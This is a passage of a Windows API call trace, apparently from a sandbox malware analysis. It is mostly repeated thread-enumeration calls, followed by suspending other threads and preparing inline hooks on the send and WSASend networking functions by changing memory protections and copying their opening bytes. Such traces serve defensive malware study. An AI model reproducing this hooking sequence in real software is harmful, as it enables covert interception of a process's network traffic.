(hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.349] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.349] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.349] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.350] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.350] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.350] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.350] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.351] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.351] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.351] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.351] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.352] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.352] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.352] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.353] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.353] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.353] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.353] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.354] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.354] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.354] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.354] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.355] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.355] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.355] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.355] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.356] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.356] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.356] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.357] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.357] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.357] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.357] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.358] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.358] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.358] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.358] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.359] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.359] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.359] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.359] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.360] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.360] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.360] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.361] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.361] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.361] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.361] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.362] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.362] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.362] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.362] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.363] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.363] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.363] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.364] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.364] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.364] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.364] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.365] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.365] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.365] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.365] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.367] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.367] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.367] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.367] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.368] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.368] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.368] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.369] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.369] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.369] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.369] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.370] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.370] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.370] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.370] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.371] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.371] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.371] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.371] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.372] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.372] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.372] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.373] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.373] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.373] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.373] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.374] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.374] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.374] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.374] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.375] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.375] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.375] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.376] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.376] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.376] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.376] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.377] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.377] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.377] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.377] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.378] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.378] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.378] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.378] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.379] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.379] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.379] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.380] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.380] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.380] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.380] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.381] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.381] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.381] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.382] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.382] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.382] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.382] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.383] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.383] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.383] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.384] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.384] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.384] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.384] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.385] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.385] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.385] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.385] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.386] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.386] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.386] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.387] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.387] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.387] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.387] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.388] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.388] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.388] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.388] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.389] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.389] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.389] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.390] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.390] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.390] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.390] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.391] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.391] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.391] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.391] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.392] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.392] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.392] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.393] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.393] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.393] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.393] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.394] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.394] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.394] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.395] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.395] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.396] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.396] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.396] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.397] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.436] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7ec) returned 0x124 [0178.436] SuspendThread (hThread=0x124) returned 0x0 [0178.436] CloseHandle (hObject=0x124) returned 1 [0178.437] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4a0) returned 0x124 [0178.437] SuspendThread (hThread=0x124) returned 0x0 [0178.437] CloseHandle (hObject=0x124) returned 1 [0178.437] CloseHandle (hObject=0x11c) returned 1 [0178.437] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0178.438] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0178.438] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x254224 | out: lpflOldProtect=0x254224*=0x20) returned 1 [0178.438] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x270000 [0178.438] RtlMoveMemory (in: Destination=0x270000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x270000) [0178.438] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x254224 | out: lpflOldProtect=0x254224*=0x40) returned 1 [0178.445] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0178.445] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0178.445] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x254224 | out: lpflOldProtect=0x254224*=0x20) returned 1 [0178.445] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x380000 [0178.445] RtlMoveMemory (in: Destination=0x380000, Source=0x75bc4406, Length=0x5 | out: Destination=0x380000) [0178.446] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x254224 | out: lpflOldProtect=0x254224*=0x40) returned 1 [0178.450] GetCurrentProcessId () returned 0x5b8 [0178.450] GetCurrentThreadId () returned 0x4e8 [0178.450] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x11c [0178.451] Thread32First (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.452] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.452] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.452] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.452] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.453] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.453] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.453] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.454] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.454] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.454] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.454] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.455] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.455] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.455] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.456] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.456] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.456] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.456] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.457] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.483] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.483] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.484] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.484] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.484] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.485] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.485] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.485] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.485] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.486] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.486] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.486] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.486] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.487] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.487] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.487] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.487] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.488] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.488] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.488] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.489] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.489] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.489] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.489] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.490] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.490] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.490] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.491] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.491] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.491] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.491] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.492] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.492] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.492] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.492] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.493] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.493] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.493] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.494] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.494] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.494] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.494] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.495] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.495] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.495] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.495] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.496] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.496] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.496] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.497] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.497] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.497] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.497] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.498] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.498] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.498] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.498] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.499] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.499] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.499] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.500] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.500] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.500] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.500] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.501] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.501] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.501] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.501] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.502] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.502] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.502] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.503] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.503] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.503] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.503] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.504] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.504] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.504] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.504] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.505] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.505] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.505] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.506] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.506] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.506] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.506] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.507] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.507] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.507] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.507] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.508] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.508] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.508] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.509] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.509] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.509] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.509] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.510] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.510] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.510] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.511] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.511] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.511] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.511] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.512] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.512] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.512] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.512] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.513] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.513] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.513] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.513] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.514] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.514] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.514] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.515] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.515] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.515] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.515] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.516] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.516] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.516] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.516] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.517] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.517] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.517] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.518] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.518] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.518] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.518] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.519] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.519] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.519] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.520] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.520] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.521] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.521] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.521] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.521] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.522] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.522] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.522] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.523] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.523] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.523] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.523] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.524] Thread32Next 